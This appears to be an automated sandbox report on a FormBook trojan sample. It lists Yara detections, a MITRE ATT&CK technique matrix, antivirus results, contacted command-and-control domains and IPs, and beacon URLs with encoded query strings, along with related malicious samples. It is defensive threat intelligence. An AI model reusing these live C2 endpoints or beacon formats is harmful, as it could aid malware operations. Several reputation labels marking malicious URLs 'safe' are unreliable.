Source: Yara match	File source: 4.2.457b22da_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.276852950.0000000001400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.480717659.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.276831846.00000000013D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.457b22da_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.457b22da_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection612	Masquerading1	Input Capture1	Security Software Discovery321	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion31	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection612	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	System Information Discovery112	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information4	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Rundll321	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing13	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
457b22da_by_Libranalysis.exe	32%	ReversingLabs	Win32.Trojan.Wacatac
457b22da_by_Libranalysis.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.457b22da_by_Libranalysis.exe.250000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File
4.2.457b22da_by_Libranalysis.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.shirleyeluiz.com/a8si/?NZb=pM4A9y9s2fQOT6MseLZ6D1nJp3ZoXi1DIz8HREKs7lWKo2rCfk3YBCWk1LbwXjkHseQ/&2dND=GVTl-	0%	Avira URL Cloud	safe
www.rogegalmish.com/a8si/	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.skynetaccess.com/a8si/?NZb=u+x8HrW8TaP2OTySFAVUaGkyVI6Qrz7itxoztY99JgBPvqcvqvs4xGCSIVWMYkPxCa9b&2dND=GVTl-	0%	Avira URL Cloud	safe
http://www.thepocket-onlinelesson.xyz/a8si/?NZb=AKlWb4FzuMtnty9OGtxovY3lKx8NV8ATEUFEzcIxGa/JytTKcc+qEWA3ceqFQyW9WUsw&2dND=GVTl-	0%	Avira URL Cloud	safe
http://www.best-cleaner.com/a8si/?NZb=62/bSqqzpTDIfVncwf8kcLNbcalsRP0e0Vdwfvu8Ay8ZWoGvbHjczG9DeoieTYsPlzHS&2dND=GVTl-	0%	Avira URL Cloud	safe
http://servermanager.miixit.org/index_ru.htmlc	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.4520oceanviewavenue.com/a8si/?NZb=O3o1U+q8oMW0A40QuM4kzZFzuvGZx18F2J1jOj0HsFueYiG3dIptHphoRZJy//fOFehA&2dND=GVTl-	0%	Avira URL Cloud	safe
http://www.omfgphil.com/a8si/?NZb=jdN+3RUems8XgJANUws4WWtkbvXxMu2hTQ/t6K3f+t8prXi7JgWKk+q+WHlFohFhnqtz&2dND=GVTl-	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	Avira URL Cloud	safe
http://www.rogegalmish.com/a8si/?NZb=+XN8NDZ1K2QCkRvOhUuLQIc57zcvFV8XafOJaWeGgjvpyrWV+MqtkcBEDSPdl300gZ3G&2dND=GVTl-	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://servermanager.miixit.org/index_ru.html	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://servermanager.miixit.org/report/reporter_index.php?name=	0%	Avira URL Cloud	safe
http://servermanager.miixit.org/1	0%	Avira URL Cloud	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.boostcoachingonline.com/a8si/?NZb=4F1bkU/AiPiMeDtr2vTtPD5XJl4c4IZLVeC3bIU2IShR3AvGXFCeCpQ25wAjwLp6N7J6&2dND=GVTl-	0%	Avira URL Cloud	safe
https://vm.tiktok.com/ZMJE3suep/a8si?NZb=jdN	0%	Avira URL Cloud	safe
http://servermanager.miixit.org/downloads/	0%	Avira URL Cloud	safe
http://servermanager.miixit.org/hits/hit_index.php?k=	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
4520oceanviewavenue.com	184.168.131.241	true	true	unknown
home-inland.com	81.88.52.88	true	true	unknown
www.shirleyeluiz.com	34.95.69.141	true	false	unknown
rogegalmish.com	192.232.222.43	true	true	unknown
www.thepocket-onlinelesson.xyz	202.210.8.86	true	true	unknown
www.omfgphil.com	64.98.145.30	true	true	unknown
drisu-goalkeeping.com	81.169.145.162	true	true	unknown
boostcoachingonline.com	184.168.131.241	true	true	unknown
www.skynetaccess.com	52.128.23.153	true	true	unknown
www.best-cleaner.com	156.252.96.189	true	true	unknown
www.drisu-goalkeeping.com	unknown	unknown	true	unknown
www.boostcoachingonline.com	unknown	unknown	true	unknown
www.home-inland.com	unknown	unknown	true	unknown
www.tracisolomon.xyz	unknown	unknown	true	unknown
www.4520oceanviewavenue.com	unknown	unknown	true	unknown
www.rogegalmish.com	unknown	unknown	true	unknown
www.webdomoupravitel.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.shirleyeluiz.com/a8si/?NZb=pM4A9y9s2fQOT6MseLZ6D1nJp3ZoXi1DIz8HREKs7lWKo2rCfk3YBCWk1LbwXjkHseQ/&2dND=GVTl-	false	Avira URL Cloud: safe	unknown
www.rogegalmish.com/a8si/	true	Avira URL Cloud: safe	low
http://www.skynetaccess.com/a8si/?NZb=u+x8HrW8TaP2OTySFAVUaGkyVI6Qrz7itxoztY99JgBPvqcvqvs4xGCSIVWMYkPxCa9b&2dND=GVTl-	true	Avira URL Cloud: safe	unknown
http://www.thepocket-onlinelesson.xyz/a8si/?NZb=AKlWb4FzuMtnty9OGtxovY3lKx8NV8ATEUFEzcIxGa/JytTKcc+qEWA3ceqFQyW9WUsw&2dND=GVTl-	true	Avira URL Cloud: safe	unknown
http://www.best-cleaner.com/a8si/?NZb=62/bSqqzpTDIfVncwf8kcLNbcalsRP0e0Vdwfvu8Ay8ZWoGvbHjczG9DeoieTYsPlzHS&2dND=GVTl-	true	Avira URL Cloud: safe	unknown
http://www.4520oceanviewavenue.com/a8si/?NZb=O3o1U+q8oMW0A40QuM4kzZFzuvGZx18F2J1jOj0HsFueYiG3dIptHphoRZJy//fOFehA&2dND=GVTl-	true	Avira URL Cloud: safe	unknown
http://www.omfgphil.com/a8si/?NZb=jdN+3RUems8XgJANUws4WWtkbvXxMu2hTQ/t6K3f+t8prXi7JgWKk+q+WHlFohFhnqtz&2dND=GVTl-	true	Avira URL Cloud: safe	unknown
http://www.rogegalmish.com/a8si/?NZb=+XN8NDZ1K2QCkRvOhUuLQIc57zcvFV8XafOJaWeGgjvpyrWV+MqtkcBEDSPdl300gZ3G&2dND=GVTl-	true	Avira URL Cloud: safe	unknown
http://www.boostcoachingonline.com/a8si/?NZb=4F1bkU/AiPiMeDtr2vTtPD5XJl4c4IZLVeC3bIU2IShR3AvGXFCeCpQ25wAjwLp6N7J6&2dND=GVTl-	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	false		high
http://servermanager.miixit.org/index_ru.htmlc	457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css	457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp	false		high
http://www.carterandcone.coml	explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	false		high
http://checkip.dyndns.org/	457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=CJU3DBQXBUQPC	457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://servermanager.miixit.org/index_ru.html	457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://servermanager.miixit.org/report/reporter_index.php?name=	457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	false		high
http://servermanager.miixit.org/1	457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fonts.com	explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://vm.tiktok.com/ZMJE3suep/a8si?NZb=jdN	rundll32.exe, 00000009.00000002.486836362.0000000004FD2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=CJU3DBQXBUQPC5http://servermana	457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmp	false		high
http://servermanager.miixit.org/downloads/	457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://servermanager.miixit.org/hits/hit_index.php?k=	457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
52.128.23.153	www.skynetaccess.com	United States	19324	DOSARRESTUS	true
192.232.222.43	rogegalmish.com	United States	46606	UNIFIEDLAYER-AS-1US	true
202.210.8.86	www.thepocket-onlinelesson.xyz	Japan	2519	VECTANTARTERIANetworksCorporationJP	true
64.98.145.30	www.omfgphil.com	Canada	32491	TUCOWS-3CA	true
156.252.96.189	www.best-cleaner.com	Seychelles	132839	POWERLINE-AS-APPOWERLINEDATACENTERHK	true
34.95.69.141	www.shirleyeluiz.com	United States	15169	GOOGLEUS	false
81.169.145.162	drisu-goalkeeping.com	Germany	6724	STRATOSTRATOAGDE	true
184.168.131.241	4520oceanviewavenue.com	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	true

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	412121
Start date:	12.05.2021
Start time:	12:23:27
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	457b22da_by_Libranalysis (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/1@12/8
EGA Information:	Failed
HDC Information:	Successful, ratio: 10.6% (good quality ratio 9.1%) Quality average: 70.1% Quality standard deviation: 34.3%
HCA Information:	Successful, ratio: 96% Number of executed functions: 129 Number of non-executed functions: 173
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe Excluded IPs from analysis (whitelisted): 13.64.90.137, 40.88.32.150, 92.122.145.220, 52.255.188.83, 184.30.20.56, 20.82.209.183, 2.20.142.209, 2.20.143.16, 92.122.213.247, 92.122.213.194, 20.54.26.129, 20.50.102.62 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net Report size getting too big, too many NtAllocateVirtualMemory calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/412121/sample/457b22da_by_Libranalysis.exe

Simulations

Behavior and APIs

Time	Type	Description
12:24:27	API Interceptor	1x Sleep call for process: 457b22da_by_Libranalysis.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
52.128.23.153	in.exe	Get hash	malicious	Browse	www.industry-automation.com/sjgd/?F6AD0t=4C9RsP0MiMfd5x3EqIWPb8N3LXE5yuIemyiinJZA7tg31FsRjvPmvbnKjZ2+rb6qC4SN&w67=DhrxPvQ0jlAtfdH0
	REQUEST FOR NEW ORDER AND SPECIFICATIONS.exe	Get hash	malicious	Browse	www.ferienschweden.com/dxe/?rL=s6Sqq23Nqxy6Bqc8f3MZosvGevB33GzO29fOayP/lE01Eq/eDpu6VUP0sUjGcOqZY2dQdVIRww==&2dqLWB=RXBtNzex
	krJF4BtzSv.exe	Get hash	malicious	Browse	www.onlineregular.com/oerg/?YL0=8pN4l4&r6A=k0e2T7kvJRK3PRo8y62ai84DWcjvpnsau5YF2j19mIw29CJGigOXt8G+epDiy588L3Hg
	PO_29_00412.exe	Get hash	malicious	Browse	www.neutrasystems.com/hw6d/?rVEt3p=S0D0v04&SPx=eQ0CjYjVQ3ZWFLT9z9t5AWcWjesy46k9o3/PiW4fNWDoBcoO4PdNNvWWcYkTRslbbC22qjAVDA==
	DHL_S390201.exe	Get hash	malicious	Browse	www.tenply.com/u2gd/?IDKPY0x=oAZBYkqsTuez1a9u+6lVnWcl/HQJuhuD2QvfP8fo+EoX0nK3YZBMl6AGY1vurgdkUfL4&Rnm=XPc43lnxP
	y6f8O0kbEB.exe	Get hash	malicious	Browse	www.clipsq.com/oerg/?mHLD_0=ujOXmawhwZWKFGghDr7+X4b1OYMZgrDZqeyOmZXhZPmqT7kE0LgD8cS3WUAvTIFghox1&ndndnZ=UtWlYrO0rhjH
	scan copy 2402021.exe	Get hash	malicious	Browse	www.ehealthak.com/edbs/?pPX=pO0puah+4fLWu/gaJSPwUdJ/22y0P48FdV7vJ0SmK5Njq7Vx485zU7W8W0MYJNonfaHF&1bj=jlK0MdGxr
	Betaling_advies.exe	Get hash	malicious	Browse	www.neutrasystems.com/hw6d/?DnbLu=eQ0CjYjVQ3ZWFLT9z9t5AWcWjesy46k9o3/PiW4fNWDoBcoO4PdNNvWWcbIpStJgY1Xn&EzuxZl=3fX4qpLxXJu
	MACHINE SPECIFICATION.exe	Get hash	malicious	Browse	www.whowealth.com/rrrq/?uDKlwt=XPiPwvlxrzD&0R-LTpD=YmZwcUxE7GKVff8FJDH+eqcbRpVkp9zoSlnpbKTKbaZlz6lL5nVCSfktGblUcnh8IKwh
	50729032021.xlsx	Get hash	malicious	Browse	www.aideliveryrobot.com/p2io/?LPRtv=xikLqsOKlSWJt+SrZg8c4HdBraEMa/77ZWZXTseglAkSxnPi++5EYIqDKkXYJ2G/5JhnXw==&SH=yzu8bdqp
	MACHINE SPECIFICATIONS.exe	Get hash	malicious	Browse	www.whowealth.com/rrrq/?ATxdA4s=YmZwcUxE7GKVff8FJDH+eqcbRpVkp9zoSlnpbKTKbaZlz6lL5nVCSfktGYJufmNHL9RwStorzg==&4hO=uDHPhJIxONuPbDb
	Shipping Documents C1216.exe	Get hash	malicious	Browse	www.toosol.com/fhg5/?idFt5Lt8=Ml/ZzGIGF1FkdUWKp7YfLz5Vhr4JtQgw1RbjRUSw4ruSIMcEU2Te3R8sgnifklbnOlMaPd/2KQ==&TZ=EjUt0xR
	9V3LjvhSMb.exe	Get hash	malicious	Browse	www.digitalkn.com/jzvu/?p0D=mfTHKdP8fLydF&jL04ln=cEqLwIJ+aRwkZKINSQ3QvunM083gkoJjrLpUcp3aBa64+rAHYbkeaE3nOi790R8PidGw
	RDAW-180-47D.exe	Get hash	malicious	Browse	www.oleandrindrugs.com/fhg5/?k2Jdl2Q=OaXU6X18MvJ5q1qcJjJuK08JGFlriH0N3sFKML6er8coazWxslMzDpjffI6ofnfbT4O7&OZiLRb=AnG0VF1hLTBpLbaP
	gV8xdP8bas.exe	Get hash	malicious	Browse	www.wellnesssensation.com/bw82/?KX9ps=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/DBianrCvuj&t6Ah=oBZx1ZuH5L
	m5bCbJdk7l.exe	Get hash	malicious	Browse	www.wellnesssensation.com/bw82/?9r=Cxl0GPu0O4YH8&lL08q=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z8vR+r7QFaHyR2mgcw==
	xloa.exe	Get hash	malicious	Browse	www.wellnesssensation.com/bw82/?cjlti=VTjl4FmxEtYHGD&FdR0zJRX=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/DBianrCvuj
	rbyB1UHXxR.exe	Get hash	malicious	Browse	www.wellnesssensation.com/bw82/?jL34YR=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/Dr9qXrGtmj&w0=mfJDabjXTrYll
	4137.exe	Get hash	malicious	Browse	www.bsf.xyz/krc/?XPGx_BL8=oSG3T25g44YEqdHLNcXBvI98o2n2iP7ZIEUUkJplaCBty9zlxmxYbQ+JtR5ITo/P6k1v&5jrH=7n6ti6PHWBWtUvjp
	COAU7229898130.xlsx	Get hash	malicious	Browse	www.digitalkn.com/jzvu/?lf=cEqLwIJ7aWwgZaEBQQ3QvunM083gkoJjrLxEAqrbF665+asBfL1SMAPlNHXrwB48pebAWQ==&JreT=PJE0oxE
202.210.8.86	1c60a1e9_by_Libranalysis.rtf	Get hash	malicious	Browse	www.thepocket-onlinelesson.xyz/a8si/?bzrD=AKlWb4F2uLtjtixCEtxovY3lKx8NV8ATEUdUvfUwC6/Iyc/MbMvmSS41f7GTUiSOdXxAeQ==&yxl4A=IJB8SptPOV

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.thepocket-onlinelesson.xyz	1c60a1e9_by_Libranalysis.rtf	Get hash	malicious	Browse	202.210.8.86

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
UNIFIEDLAYER-AS-1US	abc8a77f_by_Libranalysis.xlsx	Get hash	malicious	Browse	67.20.76.71
	Revised Invoice pdf.exe	Get hash	malicious	Browse	192.185.171.219
	DINTEC HCU24021ED.exe	Get hash	malicious	Browse	162.241.169.22
	dd9097e7_by_Libranalysis.exe	Get hash	malicious	Browse	192.185.171.219
	RFQ.exe	Get hash	malicious	Browse	192.185.129.32
	Order 122001-220 guanzo.exe	Get hash	malicious	Browse	162.241.62.63
	in.exe	Get hash	malicious	Browse	162.241.244.112
	PO-002755809-NO#PRT101 Order pdf.exe	Get hash	malicious	Browse	162.144.13.239
	catalog-1908475637.xls	Get hash	malicious	Browse	108.167.180.164
	catalog-1908475637.xls	Get hash	malicious	Browse	108.167.180.164
	export of purchase order 7484876.xlsm	Get hash	malicious	Browse	108.179.232.90
	XM7eDjwHqp.xlsm	Get hash	malicious	Browse	162.241.190.216
	QTFsui5pLN.xlsm	Get hash	malicious	Browse	108.179.232.90
